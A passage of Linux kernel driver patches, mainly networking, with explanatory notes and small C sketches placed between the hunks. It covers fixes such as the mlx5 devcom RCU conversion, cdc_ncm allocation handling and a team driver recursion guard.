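 * XDP and RX polling -- is skipped entirely. */
static int poll_sketch(int budget)
{
	int work_done = 0;

	/* ... reap TX completion queues here, always done ... */

	if (budget == 0)
		return 0;		/* do as little as possible */

	/* ... XDP and RX processing only with a real budget ... */
	work_done = budget / 2;		/* stand-in for packets processed */

	return work_done;
}

int main(void)
{
	printf("%d %d\n", poll_sketch(0), poll_sketch(64));	/* 0 32 */
	return 0;
}
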
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+index 6e6e0864063f1..821c78bab3732 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.h
+@@ -368,6 +368,8 @@ int mlx5_eswitch_enable(struct mlx5_eswitch *esw, int num_vfs);
+ void mlx5_eswitch_disable_sriov(struct mlx5_eswitch *esw, bool clear_vf);
+ void mlx5_eswitch_disable_locked(struct mlx5_eswitch *esw);
+ void mlx5_eswitch_disable(struct mlx5_eswitch *esw);
++void mlx5_esw_offloads_devcom_init(struct mlx5_eswitch *esw);
++void mlx5_esw_offloads_devcom_cleanup(struct mlx5_eswitch *esw);
+ int mlx5_eswitch_set_vport_mac(struct mlx5_eswitch *esw,
+ 			       u16 vport, const u8 *mac);
+ int mlx5_eswitch_set_vport_state(struct mlx5_eswitch *esw,
+@@ -757,6 +759,8 @@ static inline void mlx5_eswitch_cleanup(struct mlx5_eswitch *esw) {}
+ static inline int mlx5_eswitch_enable(struct mlx5_eswitch *esw, int num_vfs) { return 0; }
+ static inline void mlx5_eswitch_disable_sriov(struct mlx5_eswitch *esw, bool clear_vf) {}
+ static inline void mlx5_eswitch_disable(struct mlx5_eswitch *esw) {}
++static inline void mlx5_esw_offloads_devcom_init(struct mlx5_eswitch *esw) {}
++static inline void mlx5_esw_offloads_devcom_cleanup(struct mlx5_eswitch *esw) {}
+ static inline bool mlx5_eswitch_is_funcs_handler(struct mlx5_core_dev *dev) { return false; }
+ static inline
+ int mlx5_eswitch_set_vport_state(struct mlx5_eswitch *esw, u16 vport, int link_state) { return 0; }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 519526a4810ef..5235b5a7b9637 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -2864,7 +2864,7 @@ err_out:
+ 	return err;
+ }
+ 
+-static void esw_offloads_devcom_init(struct mlx5_eswitch *esw)
++void mlx5_esw_offloads_devcom_init(struct mlx5_eswitch *esw)
+ {
+ 	struct mlx5_devcom *devcom = esw->dev->priv.devcom;
+ 
+@@ -2887,7 +2887,7 @@ static void esw_offloads_devcom_init(struct mlx5_eswitch *esw)
+ 			       ESW_OFFLOADS_DEVCOM_PAIR, esw);
+ }
+ 
+-static void esw_offloads_devcom_cleanup(struct mlx5_eswitch *esw)
++void mlx5_esw_offloads_devcom_cleanup(struct mlx5_eswitch *esw)
+ {
+ 	struct mlx5_devcom *devcom = esw->dev->priv.devcom;
+ 
+@@ -3357,8 +3357,6 @@ int esw_offloads_enable(struct mlx5_eswitch *esw)
+ 	if (err)
+ 		goto err_vports;
+ 
+-	esw_offloads_devcom_init(esw);
+-
+ 	return 0;
+ 
+ err_vports:
+@@ -3399,7 +3397,6 @@ static int esw_offloads_stop(struct mlx5_eswitch *esw,
+ 
+ void esw_offloads_disable(struct mlx5_eswitch *esw)
+ {
+-	esw_offloads_devcom_cleanup(esw);
+ 	mlx5_eswitch_disable_pf_vf_vports(esw);
+ 	esw_offloads_unload_rep(esw, MLX5_VPORT_UPLINK);
+ 	esw_set_passing_vport_metadata(esw, false);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.c
+index adefde3ea9410..b7d779d08d837 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.c
+@@ -3,6 +3,7 @@
+ 
+ #include <linux/mlx5/vport.h>
+ #include "lib/devcom.h"
++#include "mlx5_core.h"
+ 
+ static LIST_HEAD(devcom_list);
+ 
+@@ -13,7 +14,7 @@ static LIST_HEAD(devcom_list);
+ 
+ struct mlx5_devcom_component {
+ 	struct {
+-		void *data;
++		void __rcu *data;
+ 	} device[MLX5_DEVCOM_PORTS_SUPPORTED];
+ 
+ 	mlx5_devcom_event_handler_t handler;
+@@ -77,6 +78,7 @@ struct mlx5_devcom *mlx5_devcom_register_device(struct mlx5_core_dev *dev)
+ 	if (MLX5_CAP_GEN(dev, num_lag_ports) != MLX5_DEVCOM_PORTS_SUPPORTED)
+ 		return NULL;
+ 
++	mlx5_dev_list_lock();
+ 	sguid0 = mlx5_query_nic_system_image_guid(dev);
+ 	list_for_each_entry(iter, &devcom_list, list) {
+ 		struct mlx5_core_dev *tmp_dev = NULL;
+@@ -102,8 +104,10 @@ struct mlx5_devcom *mlx5_devcom_register_device(struct mlx5_core_dev *dev)
+ 
+ 	if (!priv) {
+ 		priv = mlx5_devcom_list_alloc();
+-		if (!priv)
+-			return ERR_PTR(-ENOMEM);
++		if (!priv) {
++			devcom = ERR_PTR(-ENOMEM);
++			goto out;
++		}
+ 
+ 		idx = 0;
+ 		new_priv = true;
+@@ -112,13 +116,16 @@ struct mlx5_devcom *mlx5_devcom_register_device(struct mlx5_core_dev *dev)
+ 	priv->devs[idx] = dev;
+ 	devcom = mlx5_devcom_alloc(priv, idx);
+ 	if (!devcom) {
+-		kfree(priv);
+-		return ERR_PTR(-ENOMEM);
++		if (new_priv)
++			kfree(priv);
++		devcom = ERR_PTR(-ENOMEM);
++		goto out;
+ 	}
+ 
+ 	if (new_priv)
+ 		list_add(&priv->list, &devcom_list);
+-
++out:
++	mlx5_dev_list_unlock();
+ 	return devcom;
+ }
+ 
+@@ -131,6 +138,7 @@ void mlx5_devcom_unregister_device(struct mlx5_devcom *devcom)
+ 	if (IS_ERR_OR_NULL(devcom))
+ 		return;
+ 
++	mlx5_dev_list_lock();
+ 	priv = devcom->priv;
+ 	priv->devs[devcom->idx] = NULL;
+ 
+@@ -141,10 +149,12 @@ void mlx5_devcom_unregister_device(struct mlx5_devcom *devcom)
+ 			break;
+ 
+ 	if (i != MLX5_DEVCOM_PORTS_SUPPORTED)
+-		return;
++		goto out;
+ 
+ 	list_del(&priv->list);
+ 	kfree(priv);
++out:
++	mlx5_dev_list_unlock();
+ }
+ 
+ void mlx5_devcom_register_component(struct mlx5_devcom *devcom,
+@@ -162,7 +172,7 @@ void mlx5_devcom_register_component(struct mlx5_devcom *devcom,
+ 	comp = &devcom->priv->components[id];
+ 	down_write(&comp->sem);
+ 	comp->handler = handler;
+-	comp->device[devcom->idx].data = data;
++	rcu_assign_pointer(comp->device[devcom->idx].data, data);
+ 	up_write(&comp->sem);
+ }
+ 
+@@ -176,8 +186,9 @@ void mlx5_devcom_unregister_component(struct mlx5_devcom *devcom,
+ 
+ 	comp = &devcom->priv->components[id];
+ 	down_write(&comp->sem);
+-	comp->device[devcom->idx].data = NULL;
++	RCU_INIT_POINTER(comp->device[devcom->idx].data, NULL);
+ 	up_write(&comp->sem);
++	synchronize_rcu();
+ }
+ 
+ int mlx5_devcom_send_event(struct mlx5_devcom *devcom,
+@@ -193,12 +204,15 @@ int mlx5_devcom_send_event(struct mlx5_devcom *devcom,
+ 
+ 	comp = &devcom->priv->components[id];
+ 	down_write(&comp->sem);
+-	for (i = 0; i < MLX5_DEVCOM_PORTS_SUPPORTED; i++)
+-		if (i != devcom->idx && comp->device[i].data) {
+-			err = comp->handler(event, comp->device[i].data,
+-					    event_data);
++	for (i = 0; i < MLX5_DEVCOM_PORTS_SUPPORTED; i++) {
++		void *data = rcu_dereference_protected(comp->device[i].data,
++						       lockdep_is_held(&comp->sem));
++
++		if (i != devcom->idx && data) {
++			err = comp->handler(event, data, event_data);
+ 			break;
+ 		}
++	}
+ 
+ 	up_write(&comp->sem);
+ 	return err;
+@@ -213,7 +227,7 @@ void mlx5_devcom_set_paired(struct mlx5_devcom *devcom,
+ 	comp = &devcom->priv->components[id];
+ 	WARN_ON(!rwsem_is_locked(&comp->sem));
+ 
+-	comp->paired = paired;
++	WRITE_ONCE(comp->paired, paired);
+ }
+ 
+ bool mlx5_devcom_is_paired(struct mlx5_devcom *devcom,
+@@ -222,7 +236,7 @@ bool mlx5_devcom_is_paired(struct mlx5_devcom *devcom,
+ 	if (IS_ERR_OR_NULL(devcom))
+ 		return false;
+ 
+-	return devcom->priv->components[id].paired;
++	return READ_ONCE(devcom->priv->components[id].paired);
+ }
+ 
+ void *mlx5_devcom_get_peer_data(struct mlx5_devcom *devcom,
+@@ -236,7 +250,7 @@ void *mlx5_devcom_get_peer_data(struct mlx5_devcom *devcom,
+ 
+ 	comp = &devcom->priv->components[id];
+ 	down_read(&comp->sem);
+-	if (!comp->paired) {
++	if (!READ_ONCE(comp->paired)) {
+ 		up_read(&comp->sem);
+ 		return NULL;
+ 	}
+@@ -245,7 +259,29 @@ void *mlx5_devcom_get_peer_data(struct mlx5_devcom *devcom,
+ 		if (i != devcom->idx)
+ 			break;
+ 
+-	return comp->device[i].data;
++	return rcu_dereference_protected(comp->device[i].data, lockdep_is_held(&comp->sem));
++}
++
++void *mlx5_devcom_get_peer_data_rcu(struct mlx5_devcom *devcom, enum mlx5_devcom_components id)
++{
++	struct mlx5_devcom_component *comp;
++	int i;
++
++	if (IS_ERR_OR_NULL(devcom))
++		return NULL;
++
++	for (i = 0; i < MLX5_DEVCOM_PORTS_SUPPORTED; i++)
++		if (i != devcom->idx)
++			break;
++
++	comp = &devcom->priv->components[id];
++	/* This can change concurrently, but the 'data' pointer will remain
++	 * valid for the duration of the RCU read section.
++	 */
++	if (!READ_ONCE(comp->paired))
++		return NULL;
++
++	return rcu_dereference(comp->device[i].data);
+ }
+ 
+ void mlx5_devcom_release_peer_data(struct mlx5_devcom *devcom,
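
The devcom.c changes above convert the per-device component data to an __rcu pointer: writers publish with rcu_assign_pointer() under the semaphore, clear with RCU_INIT_POINTER() followed by synchronize_rcu(), and the new mlx5_devcom_get_peer_data_rcu() reader dereferences it inside the caller's RCU read-side section (see the rcu_read_lock() in the en_tc.c hunk). A kernel-style sketch of the same publish/read pattern, with hypothetical names and none of the driver's surrounding logic:

#include <linux/rcupdate.h>
#include <linux/rwsem.h>

struct peer_slot {
	void __rcu *data;	/* mirrors component->device[i].data */
};

static struct peer_slot slot;
static DECLARE_RWSEM(slot_sem);

/* Writer: publish under the lock so readers never see a half-built object. */
static void slot_publish(void *obj)
{
	down_write(&slot_sem);
	rcu_assign_pointer(slot.data, obj);
	up_write(&slot_sem);
}

/* Writer: unpublish, then wait for all in-flight readers before the
 * caller is allowed to free the object. */
static void slot_unpublish(void)
{
	down_write(&slot_sem);
	RCU_INIT_POINTER(slot.data, NULL);
	up_write(&slot_sem);
	synchronize_rcu();
}

/* Lock-free reader: the object is only guaranteed to stay valid for the
 * duration of the RCU read-side section, which is exactly the contract
 * mlx5_devcom_get_peer_data_rcu() gives its callers. */
static void slot_use(void (*fn)(void *))
{
	void *obj;

	rcu_read_lock();
	obj = rcu_dereference(slot.data);
	if (obj)
		fn(obj);
	rcu_read_unlock();
}
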
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.h b/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.h
+index 94313c18bb647..9a496f4722dad 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/devcom.h
+@@ -41,6 +41,7 @@ bool mlx5_devcom_is_paired(struct mlx5_devcom *devcom,
+ 
+ void *mlx5_devcom_get_peer_data(struct mlx5_devcom *devcom,
+ 				enum mlx5_devcom_components id);
++void *mlx5_devcom_get_peer_data_rcu(struct mlx5_devcom *devcom, enum mlx5_devcom_components id);
+ void mlx5_devcom_release_peer_data(struct mlx5_devcom *devcom,
+ 				   enum mlx5_devcom_components id);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index cc8057c4f9080..91724c5450a05 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1024,7 +1024,7 @@ static int mlx5_init_once(struct mlx5_core_dev *dev)
+ 
+ 	dev->dm = mlx5_dm_create(dev);
+ 	if (IS_ERR(dev->dm))
+-		mlx5_core_warn(dev, "Failed to init device memory%d\n", err);
++		mlx5_core_warn(dev, "Failed to init device memory %ld\n", PTR_ERR(dev->dm));
+ 
+ 	dev->tracer = mlx5_fw_tracer_create(dev);
+ 	dev->hv_vhca = mlx5_hv_vhca_create(dev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
+index 16d65fe4f654a..84364691a3791 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
+@@ -117,6 +117,8 @@ int mlx5dr_cmd_query_device(struct mlx5_core_dev *mdev,
+ 	caps->gvmi		= MLX5_CAP_GEN(mdev, vhca_id);
+ 	caps->flex_protocols	= MLX5_CAP_GEN(mdev, flex_parser_protocols);
+ 	caps->sw_format_ver	= MLX5_CAP_GEN(mdev, steering_format_version);
++	caps->roce_caps.fl_rc_qp_when_roce_disabled =
++		MLX5_CAP_GEN(mdev, fl_rc_qp_when_roce_disabled);
+ 
+ 	if (MLX5_CAP_GEN(mdev, roce)) {
+ 		err = dr_cmd_query_nic_vport_roce_en(mdev, 0, &roce_en);
+@@ -124,7 +126,7 @@ int mlx5dr_cmd_query_device(struct mlx5_core_dev *mdev,
+ 			return err;
+ 
+ 		caps->roce_caps.roce_en = roce_en;
+-		caps->roce_caps.fl_rc_qp_when_roce_disabled =
++		caps->roce_caps.fl_rc_qp_when_roce_disabled |=
+ 			MLX5_CAP_ROCE(mdev, fl_rc_qp_when_roce_disabled);
+ 		caps->roce_caps.fl_rc_qp_when_roce_enabled =
+ 			MLX5_CAP_ROCE(mdev, fl_rc_qp_when_roce_enabled);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_ste.c b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_ste.c
+index 09ebd3088857b..7815a629d7e1a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_ste.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_ste.c
+@@ -15,7 +15,8 @@ static u32 dr_ste_crc32_calc(const void *input_data, size_t length)
+ {
+ 	u32 crc = crc32(0, input_data, length);
+ 
+-	return (__force u32)htonl(crc);
++	return (__force u32)((crc >> 24) & 0xff) | ((crc << 8) & 0xff0000) |
++			    ((crc >> 8) & 0xff00) | ((crc << 24) & 0xff000000);
+ }
+ 
+ bool mlx5dr_ste_supp_ttl_cs_recalc(struct mlx5dr_cmd_caps *caps)
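
The dr_ste.c hunk above replaces htonl() with an open-coded byte swap; htonl() is a no-op on big-endian hosts, so the old code only produced the byte-swapped CRC on little-endian machines. A standalone sketch (with a made-up CRC value) showing the open-coded form is host-order independent:

#include <stdio.h>
#include <stdint.h>

/* Same byte swap as the new dr_ste_crc32_calc(): always reverses the
 * four bytes, regardless of host endianness. */
static uint32_t crc_swab32(uint32_t crc)
{
	return ((crc >> 24) & 0xff) | ((crc << 8) & 0xff0000) |
	       ((crc >> 8) & 0xff00) | ((crc << 24) & 0xff000000);
}

int main(void)
{
	uint32_t crc = 0x11223344;	/* hypothetical CRC value */

	printf("0x%08x -> 0x%08x\n", crc, crc_swab32(crc));	/* 0x44332211 */
	return 0;
}
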
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_main.c b/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
+index 569108c49cbc5..9ce46588aaf03 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_main.c
+@@ -987,6 +987,16 @@ static int lan966x_reset_switch(struct lan966x *lan966x)
+ 
+ 	reset_control_reset(switch_reset);
+ 
++	/* Don't reinitialize the switch core if it is already initialized. In
++	 * case it is initialized twice, some pointers inside the queue system
++	 * in HW will get corrupted and then after a while the queue system gets
++	 * full and no traffic is passing through the switch. The issue is seen
++	 * when loading and unloading the driver and sending traffic through the
++	 * switch.
++	 */
++	if (lan_rd(lan966x, SYS_RESET_CFG) & SYS_RESET_CFG_CORE_ENA)
++		return 0;
++
+ 	lan_wr(SYS_RESET_CFG_CORE_ENA_SET(0), lan966x, SYS_RESET_CFG);
+ 	lan_wr(SYS_RAM_INIT_RAM_INIT_SET(1), lan966x, SYS_RAM_INIT);
+ 	ret = readx_poll_timeout(lan966x_ram_init, lan966x,
+diff --git a/drivers/net/ethernet/nvidia/forcedeth.c b/drivers/net/ethernet/nvidia/forcedeth.c
+index daa028729d444..486cbc8ab2242 100644
+--- a/drivers/net/ethernet/nvidia/forcedeth.c
++++ b/drivers/net/ethernet/nvidia/forcedeth.c
+@@ -6138,6 +6138,7 @@ static int nv_probe(struct pci_dev *pci_dev, const struct pci_device_id *id)
+ 	return 0;
+ 
+ out_error:
++	nv_mgmt_release_sema(dev);
+ 	if (phystate_orig)
+ 		writel(phystate|NVREG_ADAPTCTL_RUNNING, base + NvRegAdapterControl);
+ out_freering:
+diff --git a/drivers/net/phy/mscc/mscc_main.c b/drivers/net/phy/mscc/mscc_main.c
+index 8a13b1ad9a330..f778e4f8b5080 100644
+--- a/drivers/net/phy/mscc/mscc_main.c
++++ b/drivers/net/phy/mscc/mscc_main.c
+@@ -2664,6 +2664,7 @@ static struct phy_driver vsc85xx_driver[] = {
+ module_phy_driver(vsc85xx_driver);
+ 
+ static struct mdio_device_id __maybe_unused vsc85xx_tbl[] = {
++	{ PHY_ID_VSC8502, 0xfffffff0, },
+ 	{ PHY_ID_VSC8504, 0xfffffff0, },
+ 	{ PHY_ID_VSC8514, 0xfffffff0, },
+ 	{ PHY_ID_VSC8530, 0xfffffff0, },
+diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
+index 62ade69295a94..b524bd374d685 100644
+--- a/drivers/net/team/team.c
++++ b/drivers/net/team/team.c
+@@ -1629,6 +1629,7 @@ static int team_init(struct net_device *dev)
+ 
+ 	team->dev = dev;
+ 	team_set_no_mode(team);
++	team->notifier_ctx = false;
+ 
+ 	team->pcpu_stats = netdev_alloc_pcpu_stats(struct team_pcpu_stats);
+ 	if (!team->pcpu_stats)
+@@ -3022,7 +3023,11 @@ static int team_device_event(struct notifier_block *unused,
+ 		team_del_slave(port->team->dev, dev);
+ 		break;
+ 	case NETDEV_FEAT_CHANGE:
+-		team_compute_features(port->team);
++		if (!port->team->notifier_ctx) {
++			port->team->notifier_ctx = true;
++			team_compute_features(port->team);
++			port->team->notifier_ctx = false;
++		}
+ 		break;
+ 	case NETDEV_PRECHANGEMTU:
+ 		/* Forbid to change mtu of underlaying device */
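
The team driver fix above brackets NETDEV_FEAT_CHANGE handling with a notifier_ctx flag, so a team_compute_features() call that itself raises another feature-change notification cannot recurse into the handler. A minimal standalone illustration of the guard (all names hypothetical):

#include <stdbool.h>
#include <stdio.h>

static bool in_notifier;	/* mirrors team->notifier_ctx */

static void recompute_features(void);

/* Handler that would re-enter itself if recompute_features() triggers
 * another feature-change notification. */
static void on_feat_change(void)
{
	if (in_notifier)
		return;		/* already processing: break the recursion */
	in_notifier = true;
	recompute_features();
	in_notifier = false;
}

static void recompute_features(void)
{
	puts("recomputing features");
	on_feat_change();	/* simulated nested notification: a no-op */
}

int main(void)
{
	on_feat_change();	/* prints once, no unbounded recursion */
	return 0;
}
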
+diff --git a/drivers/net/usb/cdc_ncm.c b/drivers/net/usb/cdc_ncm.c
+index 0897fdb6254b8..789e3647f9795 100644
+--- a/drivers/net/usb/cdc_ncm.c
++++ b/drivers/net/usb/cdc_ncm.c
+@@ -180,9 +180,12 @@ static u32 cdc_ncm_check_tx_max(struct usbnet *dev, u32 new_tx)
+ 	else
+ 		min = ctx->max_datagram_size + ctx->max_ndp_size + sizeof(struct usb_cdc_ncm_nth32);
+ 
+-	max = min_t(u32, CDC_NCM_NTB_MAX_SIZE_TX, le32_to_cpu(ctx->ncm_parm.dwNtbOutMaxSize));
+-	if (max == 0)
++	if (le32_to_cpu(ctx->ncm_parm.dwNtbOutMaxSize) == 0)
+ 		max = CDC_NCM_NTB_MAX_SIZE_TX; /* dwNtbOutMaxSize not set */
++	else
++		max = clamp_t(u32, le32_to_cpu(ctx->ncm_parm.dwNtbOutMaxSize),
++			      USB_CDC_NCM_NTB_MIN_OUT_SIZE,
++			      CDC_NCM_NTB_MAX_SIZE_TX);
+ 
+ 	/* some devices set dwNtbOutMaxSize too low for the above default */
+ 	min = min(min, max);
+@@ -1243,6 +1246,9 @@ cdc_ncm_fill_tx_frame(struct usbnet *dev, struct sk_buff *skb, __le32 sign)
+ 			 * further.
+ 			 */
+ 			if (skb_out == NULL) {
++				/* If even the smallest allocation fails, abort. */
++				if (ctx->tx_curr_size == USB_CDC_NCM_NTB_MIN_OUT_SIZE)
++					goto alloc_failed;
+ 				ctx->tx_low_mem_max_cnt = min(ctx->tx_low_mem_max_cnt + 1,
+ 							      (unsigned)CDC_NCM_LOW_MEM_MAX_CNT);
+ 				ctx->tx_low_mem_val = ctx->tx_low_mem_max_cnt;
+@@ -1261,13 +1267,8 @@ cdc_ncm_fill_tx_frame(struct usbnet *dev, struct sk_buff *skb, __le32 sign)
+ 			skb_out = alloc_skb(ctx->tx_curr_size, GFP_ATOMIC);
+ 
+ 			/* No allocation possible so we will abort */
+-			if (skb_out == NULL) {
+-				if (skb != NULL) {
+-					dev_kfree_skb_any(skb);
+-					dev->net->stats.tx_dropped++;
+-				}
+-				goto exit_no_skb;
+-			}
++			if (!skb_out)
++				goto alloc_failed;
+ 			ctx->tx_low_mem_val--;
+ 		}
+ 		if (ctx->is_ndp16) {
+@@ -1460,6 +1461,11 @@ cdc_ncm_fill_tx_frame(struct usbnet *dev, struct sk_buff *skb, __le32 sign)
+ 
+ 	return skb_out;
+ 
++alloc_failed:
++	if (skb) {
++		dev_kfree_skb_any(skb);
++		dev->net->stats.tx_dropped++;
++	}
+ exit_no_skb:
+ 	/* Start timer, if there is a remaining non-empty skb */
+ 	if (ctx->tx_curr_skb != NULL && n > 0)
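
In the cdc_ncm hunk above, a zero dwNtbOutMaxSize keeps the driver default while any other value is clamped into the legal NTB range instead of collapsing to zero and falling back. A standalone sketch of that selection; the two bounds are stand-ins for USB_CDC_NCM_NTB_MIN_OUT_SIZE and CDC_NCM_NTB_MAX_SIZE_TX, whose real values may differ:

#include <stdio.h>
#include <stdint.h>

#define NTB_MIN_OUT_SIZE 2048u		/* assumed minimum, for illustration */
#define NTB_MAX_SIZE_TX  32768u		/* assumed maximum, for illustration */

#define clamp(v, lo, hi) ((v) < (lo) ? (lo) : (v) > (hi) ? (hi) : (v))

static uint32_t tx_max(uint32_t dwNtbOutMaxSize)
{
	if (dwNtbOutMaxSize == 0)	/* field not set: use the default */
		return NTB_MAX_SIZE_TX;
	return clamp(dwNtbOutMaxSize, NTB_MIN_OUT_SIZE, NTB_MAX_SIZE_TX);
}

int main(void)
{
	printf("%u %u %u %u\n",
	       tx_max(0),		/* 32768: default */
	       tx_max(512),		/* 2048: raised to the minimum */
	       tx_max(16384),		/* 16384: already in range */
	       tx_max(1 << 20));	/* 32768: capped at the maximum */
	return 0;
}
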
+diff --git a/drivers/platform/mellanox/mlxbf-pmc.c b/drivers/platform/mellanox/mlxbf-pmc.c
+index c2c9b0d3244cb..be967d797c28e 100644
+--- a/drivers/platform/mellanox/mlxbf-pmc.c
++++ b/drivers/platform/mellanox/mlxbf-pmc.c
+@@ -1348,9 +1348,8 @@ static int mlxbf_pmc_map_counters(struct device *dev)
+ 
+ 	for (i = 0; i < pmc->total_blocks; ++i) {
+ 		if (strstr(pmc->block_name[i], "tile")) {
+-			ret = sscanf(pmc->block_name[i], "tile%d", &tile_num);
+-			if (ret < 0)
+-				return ret;
++			if (sscanf(pmc->block_name[i], "tile%d", &tile_num) != 1)
++				return -EINVAL;
+ 
+ 			if (tile_num >= pmc->tile_count)
+ 				continue;
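
The mlxbf-pmc fix above works because sscanf() returns the number of successful conversions, not a negative errno: a block named just "tile" yields 0, which the old "ret < 0" test let through with tile_num uninitialized. A standalone demonstration:

#include <stdio.h>

static int parse_tile(const char *name, int *tile)
{
	/* sscanf() reports conversions performed: "tile" with no digits
	 * returns 0, which a "< 0" check would wrongly accept. */
	if (sscanf(name, "tile%d", tile) != 1)
		return -1;
	return 0;
}

int main(void)
{
	int tile;

	printf("%d\n", parse_tile("tile7", &tile));	/* 0, tile == 7 */
	printf("%d\n", parse_tile("tile", &tile));	/* -1: no number */
	return 0;
}
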
+diff --git a/drivers/platform/x86/hp/hp-wmi.c b/drivers/platform/x86/hp/hp-wmi.c
+index 94af7d398a1bf..3bacee2b8d521 100644
+--- a/drivers/platform/x86/hp/hp-wmi.c
++++ b/drivers/platform/x86/hp/hp-wmi.c
+@@ -552,7 +552,7 @@ static int __init hp_wmi_enable_hotkeys(void)
+ 
+ static int hp_wmi_set_block(void *data, bool blocked)
+ {
+-	enum hp_wmi_radio r = (enum hp_wmi_radio) data;
++	enum hp_wmi_radio r = (long)data;
+ 	int query = BIT(r + 8) | ((!blocked) << r);
+ 	int ret;
+ 
+diff --git a/drivers/platform/x86/intel/ifs/load.c b/drivers/platform/x86/intel/ifs/load.c
+index d056617ddc853..3e52b4eb14505 100644
+--- a/drivers/platform/x86/intel/ifs/load.c
++++ b/drivers/platform/x86/intel/ifs/load.c
+@@ -154,7 +154,7 @@ static int scan_chunks_sanity_check(struct device *dev)
+ 			continue;
+ 		reinit_completion(&ifs_done);
+ 		local_work.dev = dev;
+-		INIT_WORK(&local_work.w, copy_hashes_authenticate_chunks);
++		INIT_WORK_ONSTACK(&local_work.w, copy_hashes_authenticate_chunks);
+ 		schedule_work_on(cpu, &local_work.w);
+ 		wait_for_completion(&ifs_done);
+ 		if (ifsd->loading_error)
+diff --git a/drivers/platform/x86/intel/speed_select_if/isst_if_common.c b/drivers/platform/x86/intel/speed_select_if/isst_if_common.c
+index fd102678c75f6..f6b32d31c5110 100644
+--- a/drivers/platform/x86/intel/speed_select_if/isst_if_common.c
++++ b/drivers/platform/x86/intel/speed_select_if/isst_if_common.c
+@@ -294,14 +294,13 @@ struct isst_if_pkg_info {
+ static struct isst_if_cpu_info *isst_cpu_info;
+ static struct isst_if_pkg_info *isst_pkg_info;
+ 
+-#define ISST_MAX_PCI_DOMAINS	8
+-
+ static struct pci_dev *_isst_if_get_pci_dev(int cpu, int bus_no, int dev, int fn)
+ {
+ 	struct pci_dev *matched_pci_dev = NULL;
+ 	struct pci_dev *pci_dev = NULL;
++	struct pci_dev *_pci_dev = NULL;
+ 	int no_matches = 0, pkg_id;
+-	int i, bus_number;
++	int bus_number;
+ 
+ 	if (bus_no < 0 || bus_no >= ISST_MAX_BUS_NUMBER || cpu < 0 ||
+ 	    cpu >= nr_cpu_ids || cpu >= num_possible_cpus())
+@@ -313,12 +312,11 @@ static struct pci_dev *_isst_if_get_pci_dev(int cpu, int bus_no, int dev, int fn
+ 	if (bus_number < 0)
+ 		return NULL;
+ 
+-	for (i = 0; i < ISST_MAX_PCI_DOMAINS; ++i) {
+-		struct pci_dev *_pci_dev;
++	for_each_pci_dev(_pci_dev) {
+ 		int node;
+ 
+-		_pci_dev = pci_get_domain_bus_and_slot(i, bus_number, PCI_DEVFN(dev, fn));
+-		if (!_pci_dev)
++		if (_pci_dev->bus->number != bus_number ||
++		    _pci_dev->devfn != PCI_DEVFN(dev, fn))
+ 			continue;
+ 
+ 		++no_matches;
+diff --git a/drivers/power/supply/axp288_fuel_gauge.c b/drivers/power/supply/axp288_fuel_gauge.c
+index 05f4131784629..3be6f3b10ea42 100644
+--- a/drivers/power/supply/axp288_fuel_gauge.c
++++ b/drivers/power/supply/axp288_fuel_gauge.c
+@@ -507,7 +507,7 @@ static void fuel_gauge_external_power_changed(struct power_supply *psy)
+ 	mutex_lock(&info->lock);
+ 	info->valid = 0; /* Force updating of the cached registers */
+ 	mutex_unlock(&info->lock);
+-	power_supply_changed(info->bat);
++	power_supply_changed(psy);
+ }
+ 
+ static struct power_supply_desc fuel_gauge_desc = {
+diff --git a/drivers/power/supply/bq24190_charger.c b/drivers/power/supply/bq24190_charger.c
+index d7400b56820d6..0d3db227b63a7 100644
+--- a/drivers/power/supply/bq24190_charger.c
++++ b/drivers/power/supply/bq24190_charger.c
+@@ -1262,6 +1262,7 @@ static void bq24190_input_current_limit_work(struct work_struct *work)
+ 	bq24190_charger_set_property(bdi->charger,
+ 				     POWER_SUPPLY_PROP_INPUT_CURRENT_LIMIT,
+ 				     &val);
++	power_supply_changed(bdi->charger);
+ }
+ 
+ /* Sync the input-current-limit with our parent supply (if we have one) */
+diff --git a/drivers/power/supply/bq25890_charger.c b/drivers/power/supply/bq25890_charger.c
+index 0e15302b8df22..ee6e28f1d52dc 100644
+--- a/drivers/power/supply/bq25890_charger.c
++++ b/drivers/power/supply/bq25890_charger.c
+@@ -650,7 +650,7 @@ static void bq25890_charger_external_power_changed(struct power_supply *psy)
+ 	if (bq->chip_version != BQ25892)
+ 		return;
+ 
